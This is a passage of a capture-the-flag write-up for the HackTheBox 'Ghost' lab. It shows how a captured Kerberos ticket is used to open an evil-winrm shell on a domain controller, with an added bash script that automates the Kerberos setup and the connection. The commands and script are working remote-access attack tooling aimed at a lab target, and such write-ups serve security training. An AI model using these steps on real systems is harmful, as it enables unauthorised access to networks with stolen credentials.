WinRM
Now that I have validated the justin.bradley credential, I can PSRemote directly to the dc01.ghost.htb host: according to both ldapdomaindump and BloodHound the user is a member of the Remote Management Users group, which is what grants WinRM access. Because the credential is held as a Kerberos ticket cache rather than a password, the attacker host first needs a krb5.conf entry mapping the GHOST.HTB realm to its KDC, dc01.ghost.htb, so that evil-winrm can authenticate with the ticket.
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ echo -e '[realms]\n\n\tGHOST.HTB = {\n\t\tkdc = dc01.ghost.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]

	GHOST.HTB = {
		kdc = dc01.ghost.htb
	}
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=justin.bradley@dc01.ghost.htb.ccache evil-winrm -i dc01.ghost.htb -r GHOST.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> whoami
ghost\justin.bradley
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (internal):
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.24
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
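The two steps above (writing krb5.conf, then pointing evil-winrm at the ticket cache) as one reproducible script. This is an added example, not code from the original writeup: it writes a fuller krb5.conf than the one-liner (default_realm and a domain_realm mapping in addition to the [realms] block), makes sure the KDC name resolves, checks the ticket cache with klist before evil-winrm is started, and only then connects. The realm, KDC, the 10.10.11.24 address and the ccache file name are taken from this page; the /etc/hosts line and the RUN_WINRM switch are my assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup.
# Kerberos setup and preflight for evil-winrm with a ccache.
# Assumed: realm GHOST.HTB, KDC dc01.ghost.htb at 10.10.11.24 (from the page),
# ccache file justin.bradley@dc01.ghost.htb.ccache (from the page),
# /etc/hosts entry and RUN_WINRM switch (my assumptions).

# Emit a krb5.conf that also sets default_realm and a domain_realm mapping,
# so tools that do not take -r, or that canonicalise host names, still pick
# the right realm. The page's one-liner only wrote the [realms] block.
write_krb5_conf() {
    realm="$1"; kdc="$2"
    domain=$(printf '%s' "$realm" | tr '[:upper:]' '[:lower:]')
    cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# Checks for the things that usually break Kerberos-over-WinRM before
# evil-winrm is even started: an unreadable ccache, a KDC name that does
# not resolve (Kerberos needs the FQDN, not the IP, for the SPN), and a
# ccache whose TGT has expired. Returns 0 only if all checks pass.
kerberos_preflight() {
    ccache="$1"; kdc="$2"
    if [ ! -r "$ccache" ]; then
        echo "ccache not readable: $ccache" >&2; return 1
    fi
    if ! getent hosts "$kdc" >/dev/null 2>&1; then
        echo "cannot resolve $kdc; add it to /etc/hosts" >&2; return 1
    fi
    # MIT klist -s is silent and exits non-zero without a valid TGT.
    # A failure here is often clock skew (>5 min) rather than a bad ticket.
    if command -v klist >/dev/null 2>&1 && ! KRB5CCNAME="$ccache" klist -s; then
        echo "no valid TGT in $ccache (expired, or clock skew?)" >&2; return 1
    fi
    return 0
}

main() {
    realm=GHOST.HTB; kdc=dc01.ghost.htb; dc_ip=10.10.11.24
    ccache="justin.bradley@dc01.ghost.htb.ccache"
    write_krb5_conf "$realm" "$kdc" | sudo tee /etc/krb5.conf >/dev/null
    # Assumed hosts entry: both the DC FQDN and the bare domain name.
    grep -q "$kdc" /etc/hosts || echo "$dc_ip $kdc ghost.htb" | sudo tee -a /etc/hosts >/dev/null
    kerberos_preflight "$ccache" "$kdc" || exit 1
    KRB5CCNAME="$ccache" evil-winrm -i "$kdc" -r "$realm"
}

# The live part only runs when explicitly requested (RUN_WINRM=1),
# so the file can also be sourced just for its functions.
if [ "${RUN_WINRM:-0}" = "1" ]; then main; fi
```

Run it with `RUN_WINRM=1 ./winrm-krb.sh` from the directory holding the ccache. If the preflight reports no valid TGT even though the ticket was just requested, sync the attacker clock against the DC before retrying; Kerberos rejects requests with more than about five minutes of skew and evil-winrm's error in that case is not descriptive.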
Initial foothold established on the dc01.ghost.htb host as the justin.bradley user via WinRM. One detail worth keeping from the ipconfig output: besides Ethernet0 2 on 10.10.11.24, the DC has a second adapter, vEthernet (internal), at 10.0.0.254/24 with no default gateway. That is the name Windows gives a host adapter bound to a Hyper-V virtual switch (here one called internal), so there is an internal 10.0.0.0/24 segment behind the DC that is worth enumerating later.